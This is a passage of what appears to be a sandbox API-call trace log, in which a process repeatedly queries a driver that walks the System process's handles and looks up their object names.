AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f83e50, HandleInformation=0x0) returned 0x0 [0241.304] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.304] PsReleaseProcessExitSynchronization () returned 0x2 [0241.304] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.304] ObQueryNameString (in: Object=0xfffffa8001f83e50, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.304] ObfDereferenceObject (Object=0xfffffa8001f83e50) returned 0x2 [0241.304] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.305] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.305] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.305] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.305] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.305] PsAcquireProcessExitSynchronization () returned 0x0 [0241.305] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.305] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f882f0, HandleInformation=0x0) returned 0x0 [0241.305] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.305] PsReleaseProcessExitSynchronization () returned 0x2 [0241.305] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.305] ObQueryNameString (in: Object=0xfffffa8001f882f0, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.305] ObfDereferenceObject (Object=0xfffffa8001f882f0) returned 0x2 [0241.305] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.305] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.305] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.305] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.305] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.305] PsAcquireProcessExitSynchronization () returned 0x0 [0241.305] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.305] ObReferenceObjectByHandle (in: Handle=0xffffffff800006cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f82460, HandleInformation=0x0) returned 0x0 [0241.305] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.305] PsReleaseProcessExitSynchronization () returned 0x2 [0241.305] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.305] ObQueryNameString (in: Object=0xfffffa8001f82460, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.306] ObfDereferenceObject (Object=0xfffffa8001f82460) returned 0x2 [0241.306] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.306] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.306] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.306] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.306] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.306] PsAcquireProcessExitSynchronization () returned 0x0 [0241.306] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.306] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f898b0, HandleInformation=0x0) returned 0x0 [0241.306] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.306] PsReleaseProcessExitSynchronization () returned 0x2 [0241.306] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.306] ObQueryNameString (in: Object=0xfffffa8001f898b0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.306] ObfDereferenceObject (Object=0xfffffa8001f898b0) returned 0x2 [0241.306] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.306] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.306] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.306] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.306] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.306] PsAcquireProcessExitSynchronization () returned 0x0 [0241.306] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.306] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f84f20, HandleInformation=0x0) returned 0x0 [0241.306] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.306] PsReleaseProcessExitSynchronization () returned 0x2 [0241.307] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.307] ObQueryNameString (in: Object=0xfffffa8001f84f20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.307] ObfDereferenceObject (Object=0xfffffa8001f84f20) returned 0x2 [0241.307] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.307] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.307] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.307] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.307] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.307] PsAcquireProcessExitSynchronization () returned 0x0 [0241.307] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.307] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f88d20, HandleInformation=0x0) returned 0x0 [0241.307] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.307] PsReleaseProcessExitSynchronization () returned 0x2 [0241.307] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.307] ObQueryNameString (in: Object=0xfffffa8001f88d20, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.307] ObfDereferenceObject (Object=0xfffffa8001f88d20) returned 0x2 [0241.307] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.307] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.307] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.307] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.307] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.308] PsAcquireProcessExitSynchronization () returned 0x0 [0241.308] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.308] ObReferenceObjectByHandle (in: Handle=0xffffffff800006dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f83590, HandleInformation=0x0) returned 0x0 [0241.308] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.308] PsReleaseProcessExitSynchronization () returned 0x2 [0241.308] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.308] ObQueryNameString (in: Object=0xfffffa8001f83590, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.308] ObfDereferenceObject (Object=0xfffffa8001f83590) returned 0x2 [0241.308] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.308] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.308] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.308] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.308] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.308] PsAcquireProcessExitSynchronization () returned 0x0 [0241.308] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.308] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f88780, HandleInformation=0x0) returned 0x0 [0241.308] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.308] PsReleaseProcessExitSynchronization () returned 0x2 [0241.308] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.308] ObQueryNameString (in: Object=0xfffffa8001f88780, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.308] ObfDereferenceObject (Object=0xfffffa8001f88780) returned 0x2 [0241.308] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.308] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.308] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.308] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.308] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.308] PsAcquireProcessExitSynchronization () returned 0x0 [0241.308] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.309] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f852c0, HandleInformation=0x0) returned 0x0 [0241.309] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.309] PsReleaseProcessExitSynchronization () returned 0x2 [0241.309] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.309] ObQueryNameString (in: Object=0xfffffa8001f852c0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.309] ObfDereferenceObject (Object=0xfffffa8001f852c0) returned 0x2 [0241.309] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.309] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.309] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.309] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.309] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.309] PsAcquireProcessExitSynchronization () returned 0x0 [0241.309] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.309] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f86350, HandleInformation=0x0) returned 0x0 [0241.309] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.309] PsReleaseProcessExitSynchronization () returned 0x2 [0241.309] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.309] ObQueryNameString (in: Object=0xfffffa8001f86350, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.309] ObfDereferenceObject (Object=0xfffffa8001f86350) returned 0x2 [0241.309] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.309] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.309] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.309] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.309] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.309] PsAcquireProcessExitSynchronization () returned 0x0 [0241.309] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.309] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f84660, HandleInformation=0x0) returned 0x0 [0241.309] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.309] PsReleaseProcessExitSynchronization () returned 0x2 [0241.310] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.310] ObQueryNameString (in: Object=0xfffffa8001f84660, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.310] ObfDereferenceObject (Object=0xfffffa8001f84660) returned 0x2 [0241.310] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.310] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.310] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.310] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.310] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.310] PsAcquireProcessExitSynchronization () returned 0x0 [0241.310] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.310] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f87680, HandleInformation=0x0) returned 0x0 [0241.310] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.310] PsReleaseProcessExitSynchronization () returned 0x2 [0241.310] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.310] ObQueryNameString (in: Object=0xfffffa8001f87680, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.310] ObfDereferenceObject (Object=0xfffffa8001f87680) returned 0x2 [0241.310] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.310] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.310] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.310] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.310] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.310] PsAcquireProcessExitSynchronization () returned 0x0 [0241.310] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.310] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f85050, HandleInformation=0x0) returned 0x0 [0241.310] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.310] PsReleaseProcessExitSynchronization () returned 0x2 [0241.311] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.311] ObQueryNameString (in: Object=0xfffffa8001f85050, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.311] ObfDereferenceObject (Object=0xfffffa8001f85050) returned 0x2 [0241.311] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.311] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.311] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.311] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.311] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.311] PsAcquireProcessExitSynchronization () returned 0x0 [0241.311] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.311] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f86af0, HandleInformation=0x0) returned 0x0 [0241.311] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.311] PsReleaseProcessExitSynchronization () returned 0x2 [0241.311] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.311] ObQueryNameString (in: Object=0xfffffa8001f86af0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.311] ObfDereferenceObject (Object=0xfffffa8001f86af0) returned 0x2 [0241.311] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.311] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.311] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.311] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.311] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.311] PsAcquireProcessExitSynchronization () returned 0x0 [0241.311] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.311] ObReferenceObjectByHandle (in: Handle=0xffffffff800006fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f96ab0, HandleInformation=0x0) returned 0x0 [0241.311] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.312] PsReleaseProcessExitSynchronization () returned 0x2 [0241.312] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.312] ObQueryNameString (in: Object=0xfffffa8001f96ab0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.312] ObfDereferenceObject (Object=0xfffffa8001f96ab0) returned 0x2 [0241.312] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.312] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.312] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.312] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.312] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.312] PsAcquireProcessExitSynchronization () returned 0x0 [0241.312] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.312] ObReferenceObjectByHandle (in: Handle=0xffffffff80000700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f95f20, HandleInformation=0x0) returned 0x0 [0241.312] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.312] PsReleaseProcessExitSynchronization () returned 0x2 [0241.312] ObfDereferenceObject 